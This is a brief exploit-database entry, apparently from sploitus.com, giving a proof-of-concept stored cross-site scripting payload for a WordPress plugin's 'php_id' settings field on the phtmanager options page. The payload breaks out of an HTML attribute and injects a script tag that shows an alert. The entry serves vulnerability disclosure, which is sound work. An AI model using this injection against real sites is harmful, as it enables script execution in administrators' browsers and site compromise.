## https://sploitus.com/exploit?id=WPEX-ID:B968B9A1-67F3-4BEF-A3D3-6E8942BB6570 Put the following payload in the "php_id" field in the plugin's settings (/wp-admin/options-general.php?page=phtmanager): "><script>alert(/XSS/)</script>